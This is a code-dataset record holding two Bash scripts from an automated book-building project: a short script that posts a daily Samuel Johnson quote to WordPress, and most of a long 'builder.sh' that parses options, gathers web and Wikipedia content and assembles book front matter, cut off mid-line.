0.6861516833305359, "alphanum_fraction": 0.693806529045105, "avg_line_length": 34.92499923706055, "blob_id": "645c5a7aed6f59c3dbc92e7b1500013f2139157f", "content_id": "7af6dff75162f8c136bb8d25a541af0c104ed651", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1437, "license_type": "permissive", "max_line_length": 185, "num_lines": 40, "path": "/scripts/includes/daily-wp-post.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. \"$HOME\"/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\necho \"creating daily wordpress post\"\necho \"$TMPDIR$uuid\"\nexit 0\nmkdir -m 775 -p \"$TMPDIR$uuid/\"daily-wordpress-post\"\n\necho \"## Today's Dose of Samuel Johnson\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '<blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"$(fortune johnson)\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '</blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\nwotd=$(fortune johnson | head -n 1 | cut -d\" \" -f1)\n\npandoc -s -o \"$TMPDIR$uuid/daily-email/daily-email.html\" \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n\"$WP_BIN\" post create \"$TMPDIR$uuid/daily-email/daily-email.html\" --post_type=post --post_status=\"$daily_email_post_to_wp_status\" --post_title=\"Samuel Johnson WOTD: $wotd\" --post_mime_type=html\n" }, { "alpha_fraction": 0.6747154593467712, "alphanum_fraction": 0.6840386986732483, "avg_line_length": 25.75137710571289, "blob_id": "dfbcdbaa661614f018adeb4fce35859134a7cc2e", "content_id": "229291dda884f07210242f24f1567dfd7928dbbf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 34001, "license_type": "permissive", "max_line_length": 247, "num_lines": 1271, "path": "/scripts/builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# accepts book topic and book type definition, then builds book\n\nloguuid=$(python -c 'import uuid; print(uuid.uuid1())')\n\nmkdir /tmp/pagekicker/\"$loguuid\"\n\ntouch /tmp/pagekicker/\"$loguuid\"/log\n\n# exec redirect below begins a rather convoluted process that is necessary to enable\n# the operation of a --verbose flag\n\nexec 3>&1 >> /tmp/pagekicker/\"$loguuid\"/startuplog\n\n\necho \"builder begins\"\necho \"\"\necho \"received from command line: \"\necho \"$@\"\necho \"\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. \"$HOME\"/.pagekicker/config.txt #hard-code here to have a nonlogin shell run the script\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\necho \"shortform is $shortform\"\n\necho \"revision number is\" $SFB_VERSION\necho \"sfb_log is\" $logdir\"sfb_log\"\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'`\n\nexport PERL_SIGNALS=\"unsafe\"\necho \"PERL_SIGNALS\" is $PERL_SIGNALS \"UNSAFE is correct\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\nexec 1>&3\necho \"version $SFB_VERSION\"\ncat assets/builder-help.txt | more\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--verbose|-v)\nexec 1>&3\necho \"verbose on\"\ncat /tmp/pagekicker/$loguuid/startuplog\nshift\n;;\n-U|--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n-s|--seedfile)\nseedfile=$2\nshift 2\n;;\n--seedfile=*)\nseedfile=${1#*=}\nshift\n;;\n-t|--booktype)\nbooktype=$2\nshift 2\n;;\n--booktype=*)\nbooktype=${1#*=}\nshift\n;;\n-T|--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n-G|--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n-S|--singleseed|s)\nsingleseed=$2\nshift 2\n;;\n--singleseed=*)\nsingleseed=${1#*=}\nshift\n;;\n--truncate_seed)\ntruncate_seed=$2\nshift 2\n;;\n--truncate_seed=*)\nshift\ntruncate_seed=${1#*=}\n;;\n-w|--sample_tweets)\nsample_tweets=$2\nshift 2\n;;\n--sample_tweets=*)\nshift\nsample_tweets=${1#*=}\n;;\n-f|--ebook_format)\nebook_format=$2\nshift 2\n;;\n--ebook_format=*)\nshift\nebook_format=${1#*=}\n;;\n-J|--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--jobprofile)\njobprofile=$2\nshift 2\n;;\n--jobprofile=*)\njobprofile=${1#*=}\nshift\n;;\n-L|--wikilang)\nwikilang=$2\nshift 2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n-M|--summary)\nsummary=$2\nshift 2\n;;\n--summary=*)\nsummary=${1#*=}\nshift\n;;\n-n|--safe_product_name)\nsafe_product_name=$2\nshift 2\n;;\n--safe_product_name=*)\nsafe_product_name=${1#*=}\nshift\n;;\n-F|--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n-L|--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--fromccc)\nfromccc=$2\nshift 2\n;;\n--fromccc=*)\nfromccc=${1#*=}\nshift\n;;\n-b|--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n-b|--byline)\neditedby=$2\nshift 2\n;;\n--byline=*)\neditedby=${1#*=}\nshift\n;;\n-Y|--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n-N|--customername)\ncustomername=$2\nshift 2\n;;\n--customername=*)\ncustomername=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--shortform)\nshortform=$2\nshift 2\n;;\n--shortform=*)\nshortform=${1#*=}\nshift\n;;\n--flickr)\nflickr=$2\nshift 2\n;;\n--flickr=*)\nflickr=${1#*=}\nshift\n;;\n--dontcleanupseeds)\ndontcleanupseeds=$2\nshift 2\n;;\n--dontcleanupseeds=*)\ndontcleanupseeds=${1#*=}\nshift\n;;\n-u|--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n-I|--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n-l|--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n--subtitle)\nsubtitle=$2\nshift 2\n;;\n--subtitle=*)\nsubtitle=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corpora=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n--mailtoadmin)\nmailtoadmin=$2\nshift 2\n;;\n--mailtoadmin=*)\nmailtoadmin=${1#*=}\nshift\n;;\n--buildcover)\nbuildcover=$2\nshift 2\n;;\n--buildcover=*)\nbuildcover=${1#*=}\nshift\n;;\n--add_this_content)\nadd_this_content=$2\nshift 2\n;;\n--add_this_content=*)\nadd_this_content=${1#*=}\nshift\n;;\n--add_this_content_part_name)\nadd_this_content_part_name=$2\nshift 2\n;;\n--add_this_content_part_name=*)\nadd_this_content_part_name=${1#*=}\nshift\n;;\n--content_collections)\ncontent_collections=$2\nshift 2\n;;\n--content_collections=*)\ncontent_collections=${1#*=}\nshift\n;;\n--expand_seeds_to_pages)\nexpand_seeds_to_pages=$2\nshift 2\n;;\n--expand_seeds_to_pages=*)\nexpand_seeds_to_pages=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper=${1#*=}\nshift\n;;\n--add_this_image)\nadd_this_image=$2\nshift 2\n;;\n--add_this_image=*)\nadd_this_image=${1#*=}\nshift\n;;\n--add_this_image_name)\nadd_this_image_name=$2\nshift 2\n;;\n--add_this_image_name=*)\nadd_this_image_name=${1#*=}\nshift\n;;\n--seedsviacli)\nseedsviacli=$2\nshift 2\n;;\n--seedsviacli=*)\nseedsviacli=${1#*=}\nshift\n;;\n--googler_on)\ngoogler_on=$2\nshift 2\n;;\n--googler_on=*)\ngoogler_on=${1#*=}\nshift\n;;\n--googler_news_on)\ngoogler_news_on=$2\nshift 2\n;;\n--googler_news_on=*)\ngoogler_news_on=${1#*=}\nshift\n;;\n--kindlegen_on)\nkindlegen_on=$2\nshift 2\n;;\n--kindlegen_on=*)\nkindlegen_on=${1#*=}\nshift\n;;\n--screen_numbered_seeds)\nscreen_numbered_seeds=$2\nshift 2\n;;\n--screen_numbered_seeds=*)\nscreen_numbered_seeds=${1#*=}\nshift\n;;\n--seedfortheday)\nseedfortheday=$2\nshift 2\n;;\n--seedfortheday=*)\nseedfortheday=${1#*=}\nshift\n;;\n--daily_email_post_to_wp)\ndaily_email_post_to_wp=$2\nshift 2\n;;\n--daily_email_post_to_wp=*)\ndaily_email_post_to_wp=${1#*=}\nshift\n;;\n--daily_email_post_to_wp_status)\ndaily_email_post_to_wp_status=$2\nshift 2\n;;\n--daily_email_post_to_wp_status=*)\ndaily_email_post_to_wp_status=${1#*=}\nshift\n;;\n--search_engine_registry)\nsearch_engine_registry=$2\nshift 2\n;;\n--search_engine_registry=*)\nsearch_engine_registry=${1#*=}\nshift\n;;\n--mediawiki_api_url)\nmediawiki_api_url$2\nshift 2\n;;\n--mediawiki_api_url=*)\nmediawiki_api_url=${1#*=}\nshift\n;;\n--url_prefix)\nurl_prefix$2\nshift 2\n;;\n--url_prefix=*)\nurl_prefix=${1#*=}\nshift\n;;\n--wikipath)\nwikipath$2\nshift 2\n;;\n--wikipath=*)\nwikipath=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\necho \"loaded options\"\n\n\necho \"LOCAL_DATA is $LOCAL_DATA\"\n\necho \"add_this_content is $add_this_content\"\n\necho \"imprint is $imprint\"\necho \"editedby is $editedby\"\necho \"jobprofilename is $jobprofilename\"\n\nhuman_author=\"$editedby\"\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"using loguuid\"\n\t#uuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\tuuid=$loguuid\n\techo \"uuid is\" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nfi\n\n# create directories I will need\n\nmkdir -p -m 755 \"$TMPDIR$uuid/actual_builds\"\nmkdir -p -m 755 \"$TMPDIR$uuid/apis\"\nmkdir -p -m 755 \"$TMPDIR$uuid/cover\"\nmkdir -p -m 755 \"$TMPDIR$uuid/twitter\"\nmkdir -p -m 777 \"$TMPDIR$uuid/fetch\"\nmkdir -p -m 777 \"$TMPDIR$uuid/flickr\"\nmkdir -p -m 777 \"$TMPDIR$uuid/images\"\nmkdir -p -m 777 \"$TMPDIR$uuid/mail\"\nmkdir -p -m 777 \"$TMPDIR$uuid/content_collections\"\nmkdir -p -m 777 \"$TMPDIR$uuid/search_engine_results\"\nmkdir -p -m 777 \"$TMPDIR$uuid/seeds\"\nmkdir -p -m 777 \"$TMPDIR$uuid/user\"\nmkdir -p -m 777 \"$TMPDIR$uuid/wiki\"\nmkdir -p -m 777 \"$TMPDIR$uuid/webseeds\"\n\nmkdir -p -m 755 -p $LOCAL_DATA\"jobprofile_builds/\"\"$jobprofilename\"\n\necho \"search engine registry is\" \"$search_engine_registry\"\n\n\nif [ -z \"$covercolor\" ]; then\n\tcovercolor=\"RosyBrown\"\n\techo \"no cover color in command line so I set it to \"$covercolor\nelse\n\techo \"cover color is $covercolor\"\nfi\n\nif [ -z \"$coverfont\" ]; then\n\tcoverfont=\"Minion\"\n\techo \"no cover font in command line so I set it to \"$coverfont\nelse\n\techo \"cover font is $coverfont\"\nfi\n\nif [ -z \"$wikilang\" ]; then\n\twikilang=\"en\"\n\techo \"no wikilang in command line so I set it to \"$wikilang\nelse\n\techo \"wiki search language is $wikilang\"\nfi\n\nif [ -z \"$imprint\" ]; then\n\timprint=\"default\"\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\nelse\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\nfi\n\nif [ -z \"$jobprofilename\" ]; then\n\tjobprofilename=\"$jobprofile\"\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nelse\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nfi\n\nTEXTDOMAIN=SFB\necho $\"hello, world, I am speaking\" $LANG\n\nsafe_product_name=$(echo \"$booktitle\"| sed -e 's/[^A-Za-z0-9._-]/_/g')\necho \"safe product name is\" $safe_product_name\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku is\" $sku\n\n\necho \"test $covercolor\" \"$coverfont\"\n\n# resolving seedfile from command line\n\necho \"getting path to seedfile from command line\"\nif [ -z \"$seedfile\" ] ; then\n\techo \"no seedfile provided\"\n\t\tif [ -z \"$singleseed\" ] ; then\n\t\t\techo \"no singleseed provided\"\n\t\t\t\tif [ -z \"$seedsviacli\" ] ; then\n\t\t\t\t\techo \"no seedsviacli provided\"\n\t\t\t\t\techo \"exiting because no seeds provided\"\n\t\t\t\t\texit 0\n\t\t\t\telse\n\t\t\t\t\techo \"semi-colon seeds provided via command line\"\n\t\t\t\t\techo \"$seedsviacli\" | sed -e 's/; /;/g' -e $'s/;/\\\\\\n/g' > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\t\tfi\n\t\telse\n\t\t\tseed=\"$singleseed\"\n\t\t\techo \"seed is now singleseed\" \"$seed\"\n\t\t\techo \"$singleseed\" > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\tfi\nelse\n\t echo \"path to seedfile was $seedfile\"\n\t\tcp $seedfile \"$TMPDIR$uuid/seeds/seedphrases\"\nfi\necho \"seedfile is $seedfile\"\n\nif [ -z \"$booktitle\" ] ; then\n\techo \"no booktitle provided by operator\"\n\n seedcount=`cat $TMPDIR$uuid/seeds/seedphrases | tr '\\n' ' ' | wc -l | tr -d ' '`\n\techo \"seedcount is $seedcount\"\n\tif [ \"$seedcount\" -gt \"1\" ] ; then\n\t\tbooktitle=$(head -n 1 \"$TMPDIR$uuid/seeds/seedphrases\")\" and more\"\n\t\t\techo \"arbitrary booktitle is $booktitle\"\n\telse\n\t\tbooktitle=$(head -n 1 \"$TMPDIR$uuid/seeds/seedphrases\")\n\t\techo \"arbitrary booktitle is $booktitle\"\n\tfi\nelse\n\techo \"booktitle provided via command line is $booktitle\"\nfi\n\n. includes/api-manager.sh\n\n\n#move assets into position\n\n#if [ \"$truncate_seed\" = \"yes\" ] ; then\n#\techo \"truncating path to seed file\"\n#\techo $seedfile\n#\tseedfile=$(dirname $seedfile)\n#\tseedfile=$seedfile\"/seedlist\"\n#\techo \"truncated seedfile\" $seedfile \" as kluge for var customer path\"\n#else\n#\techo \"not truncating seedfile\"\n#fi\n\n#echo \"seedfile is \" $seedfile\n#ls -lart \"seedfile is\" $seedfile\n\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\n\n#if cmp -s \"$seedfile\" \"$TMPDIR\"$uuid\"/seeds/seedphrases\" ; then\n#\techo \"seedfiles are identical, no action necessary\"\n#else\n#\techo \"Rotating new seedfile into tmpdir\"\n#\tcp \"$seedfile\" \"$TMPDIR\"$uuid\"/seeds/seedphrases\"\n#fi\n\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"\"$uuid\"\ncp $confdir\"jobprofiles\"/signatures/\"$sigfile\" \"$TMPDIR\"\"$uuid\"\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid\"/cover\"\n\n# create placeholder seedfortheday file\n\ntouch \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n\n# extracts seeds from analyzed webpage\n\nif [ -z ${analyze_url+x} ] ; then\n\techo \"$analyze_url not set as analyze_url\"\nelse\n\tif [[ $analyze_url =~ $httpvalidate ]] ; then\n\t\techo \"$analyze_url is valid URI\"\n\t\techo \"analyze_url is set as $analyze_url\"\n\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/webpage.md\"\n\t\t#\"$PYTHON27_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/webpage.md\" \"$TMPDIR\"$uuid\"/webseeds\" \"$uuid\"\n\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$TMPDIR\"$uuid\"/webpage.md\" -outputFormat tabbedEntities > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcd $scriptpath && echo \"seeds have been extracted from analyze_url\"\n\t\thead -n \"$top_q\" \"$TMPDIR\"$uuid\"/webseeds\" | sed '/^\\s*$/d' > \"$TMPDIR\"$uuid\"/webseeds.top_q\"\n\t\tcat \"$TMPDIR\"$uuid\"/webseeds.top_q\" > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/webseeds\") <(sort \"locale/stopwords/webstopwords.en\") >> \"$TMPDIR\"$uuid/seeds/seedphrases\n\telse\n\t\techo \"invalid URI, analyze_url not added\"\n\tfi\nfi\n\n# creates sorted & screened list of seeds\nif [ \"$screen_numbered_seeds\" = \"yes\" ] ; then\n\tsort -u --ignore-case \"$TMPDIR$uuid/seeds/seedphrases\" \t| sed -e '/^$/d' -e '/^[0-9#@]/d' > \"$TMPDIR\"$uuid/seeds/sorted.seedfile\n\techo \"screened out seeds beginning with 0-9, #, @\"\nelse\n\tsort -u --ignore-case \"$TMPDIR$uuid/seeds/seedphrases\" > \"$TMPDIR\"$uuid/seeds/sorted.seedfile\nfi\n\necho \"---\"\necho \"seeds are\"\ncat \"$TMPDIR$uuid/seeds/sorted.seedfile\"\necho \"---\"\n\n# look at $search_engine_registry\n\n\n# decides what additional search engines will be used\n\n# loops over searches\n\nwhile IFS=, read -r search_engine_on search_plugin_path search_credentials\ndo\n echo \"I got:\" \"$search_engine_on\" \"$search_plugin_path\" \"$search_credentials\"\n\t\tif [ \"$search_engine_on\" = \"yes\" ] ; then\n\t\t echo \"test $search_plugin_path\"\n\t\t\t \"$search_plugin_path\"\n\t else\n\t\t\t\"not running search plugin $search_plugin_path\"\n\t\t\ttouch \"$TMPDIR$uuid/search_engine_content.md\"\n\t\tfi\ndone < \"$search_engine_registry\"\n\n# Wikipedia search is on by default\n\n. includes/mediawiki-fetch-loop.sh\n\n\n# adds search results to wiki4cloud\n\n# testing with dummy data\n\n#cp ~/lorem \"$TMPDIR$uuid/search_engine_results/cumulative.md\"\n\n# end test\n\nif [ \"$search_engine_on\" = \"yes\" ] ; then\n\techo \"adding search engine results to cover cloud\"\n\tcat \"$TMPDIR$uuid/search_engine_results/cumulative.md\" >> \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\nelse\n\techo \"no search engine results to add to cover cloud\"\n\ttouch \"$TMPDIR\"$uuid/search_engine_results/cumulative.md\nfi\n\n# adds user-provided content\n\nif [ \"$add_this_content\" = \"none\" ] ; then\n\techo \"no added content\"\n\ttouch \"$TMPDIR\"$uuid/add_this_content.md\nelse\n\techo \"adding user content to cover cloud\"\n\tcp \"$add_this_content\" \"$TMPDIR\"$uuid\"/add_this_content_raw\"\n\techo \"$add_this_content\"\n\t\"$PANDOC_BIN\" -f docx -s -t markdown -o \"$TMPDIR\"$uuid\"/add_this_content.md \"$TMPDIR\"$uuid/add_this_content_raw\"\n\tcat \"$TMPDIR$uuid/add_this_content.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\nfi\n\n# use googler to get search snippets\n\nif [ \"$googler_on\" = \"yes\" ] ; then\n\t. includes/googler.sh\n\nelse\n\techo \"not fetching Search Engine Snippets\"\n\ttouch \"$TMPDIR$uuid/googler.md\"\nfi\n\n\tcat \"$TMPDIR$uuid/googler.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\nif [ \"$googler_news_on\" = \"yes\" ] ; then\n\t. includes/googler-news.sh\n\nelse\n\techo \"not fetching News Snippets\"\n\ttouch \"$TMPDIR$uuid/googler-news.md\"\nfi\n\ncat \"$TMPDIR$uuid/googler-news.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\nif [ -n \"$content_collections\" ] ; then\n\techo \"content collections has value\"\n\t. includes/search-content-collections.sh\n\tcat \"$TMPDIR$uuid/content_collections/content_collections_results.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n \"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o \"$TMPDIR$uuid/content_collections/summary.md\" \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\nelse\n\techo \"not searching content collections\"\n\ttouch \"$TMPDIR\"$uuid/content_collections/content_collections_results.md\n\ttouch \"$TMPDIR\"$uuid/content_collections/content_sources.md\nfi\n\necho \"summary is\" $summary #summary should be on for cover building\nwikilocale=\"en\" # hard code for testing\necho $wikilocale \"is wikilocale\"\n\nif [ -n \"$wordcountsummaries\" ] ; then\n\techo \"summaries data has been returned, proceeding\"\n\twordcountsummaries=$(wc -w \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | cut -f1 -d' ')\n\nelif [ \"$wordcountpages\" -gt \"0\" ] ; then\n\techo \"pages data has been returned, proceeding\"\n\twordcount=$(wc -w \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | cut -f1 -d' ')\n\nelse\n\n\techo \"zero data returned from wiki, exiting with error message\"\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"Your submission [ $booktitle ] has not been added to the catalog\" \\\n\t\t-m \"The system was not able to find any valid seed terms in your submission. Make sure that you have provided several keyphrases and that the words are spelled correctly. Please let us know by replying to this message if you need assistance.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-v \\\n\t\t-o tls=yes\n\texit 73\nfi\n\n\t# build front matter page by page\n\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \"# About $editedby\" >> \"$TMPDIR\"$uuid/titlepage.md\n\tcat \"$authorbio\" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\n#acknowledgments\n\n. includes/acknowledgments.sh\n\n# describe the key settings used in book\n. includes/settings.sh\n\n# human-written abstracts\n\n. includes/abstracts.sh\n\n. includes/listofpages.sh\n\n. includes/topics_covered_runon.sh\n\n# changelog\n\n. includes/changelog.sh\n\n\t# run acronyms, programmatic summary, nerv3\n\t# against wiki4cloud content\n\ncat \"$TMPDIR$uuid/wiki/wiki4cloud.md\" >> \"$TMPDIR$uuid/tmpbody.md\"\n\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/targetfile.txt -t plain -f markdown+smart \"$TMPDIR\"$uuid/tmpbody.md\n\n#split into chunks that can be handled in memory\n\nsplit -b 50000 \"$TMPDIR\"$uuid/targetfile.txt \"$TMPDIR\"$uuid\"/xtarget.\"\n\n. includes/transect_summarize_ner.sh\n\n# clean up both unprocessed and postprocessed summary text\n\n cp \"$TMPDIR$uuid/pp_summary.txt\" \"$TMPDIR$uuid/clean_summary.txt\"\n\n\tsed -i G \"$TMPDIR\"$uuid/pp_summary.txt\n\n\tsed -i G \"$TMPDIR\"$uuid/summary.txt\n echo\n\tsed -n 3p \"$TMPDIR\"$uuid/pp_summary.txt > \"$TMPDIR\"$uuid/pp_summary_all.txt # for tldr\n\techo '\\pagenumbering{gobble}' > \"$TMPDIR\"$uuid/pp_summary_sky.txt\n\n\techo \" \" >> \"$TMPDIR\"$uuid/pp_summary_sky.txt\n sed -n 1,35p \"$TMPDIR\"$uuid/pp_summary.txt >> \"$TMPDIR\"$uuid/pp_summary_sky.txt # for skyscraper\n cp \"$TMPDIR\"$uuid/pp_summary_sky.txt $TMPDIR$uuid/pp_summary_sky.md\n\n\t# throw away unpreprocessed summary text if zero size\n\n\tif [ `wc -c < \"$TMPDIR\"$uuid/pp_summary.txt` = \"0\" ] ; then\n\t echo using \"unpostprocessed summary bc wc pp summary = 0\"\n\t cat \"$TMPDIR$uuid\"/summary.txt >> $TMPDIR$uuid/programmaticsummary.md\n\telse\n\t cp \"$TMPDIR\"$uuid/pp_summary.txt \"$TMPDIR\"$uuid/summary.md\n\t\tcat \"$TMPDIR$uuid\"/summary.md >> $TMPDIR$uuid/programmaticsummary.md\n\tfi\n\n#tldr\n\n. includes/tldr_auto.sh #returns tldr.txt and tldr.md\n\n# assemble body\n\n## user provided content\n\n\n## encyclopedia content\n\nif [ \"$summary\" = \"summaries_only\" ] ; then\n\techo \"no body\"\n\ttouch $TMPDIR$uuid/chapters.md\nelse\n\techo \" \" >> $TMPDIR$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\n\techo \"# Encyclopedia Content\" >> \"$TMPDIR\"$uuid/chapters.md\n\tcat \"$TMPDIR\"$uuid\"/wiki/wiki4chapters.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\nfi\n\n# assemble section for search engine content\n\n#echo \" \" >> $TMPDIR$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \"# Search Engine Content\" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#cat \"$TMPDIR\"$uuid\"/search_engine_results/cumulative.md\" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n\n# acronyms\n\necho \"# Acronyms\" > $TMPDIR$uuid/tmpacronyms.md\necho \" \" >> $TMPDIR$uuid/tmpacronyms.md\necho \" \" >> $TMPDIR$uuid/tmpacronyms.md\n$scriptpath/bin/acronym-filter.sh --txtinfile \"$TMPDIR\"$uuid/targetfile.txt > \"$TMPDIR\"$uuid/acronyms.txt\nsed G $TMPDIR$uuid/acronyms.txt | sed 's/^#/[hashtag]/g' >> $TMPDIR$uuid/acronyms.md\ncat $TMPDIR$uuid/acronyms.md >> $TMPDIR$uuid/tmpacronyms.md\ncp $TMPDIR$uuid/tmpacronyms.md $TMPDIR$uuid/acronyms.md\n\n# Unique nouns\ncat \"$TMPDIR\"$uuid/Places \"$TMPDIR\"$uuid/People \"$TMPDIR\"$uuid/Other > \"$TMPDIR\"$uuid/all_nouns.txt\n#ls \"$TMPDIR\"$uuid/xtarget.*nouns* > \"$TMPDIR\"$uuid/testnouns\n# cat \"$TMPDIR\"$uuid/xtarget.*nouns* > \"$TMPDIR\"$uuid/all_nouns.txt\nsort --ignore-case \"$TMPDIR\"$uuid/all_nouns.txt | sed 's/^#/[hashtag]/g' | uniq > \"$TMPDIR\"$uuid/sorted_uniqs.txt\nsed '1s/^/# Unique Proper Nouns and Key terms\\n/' 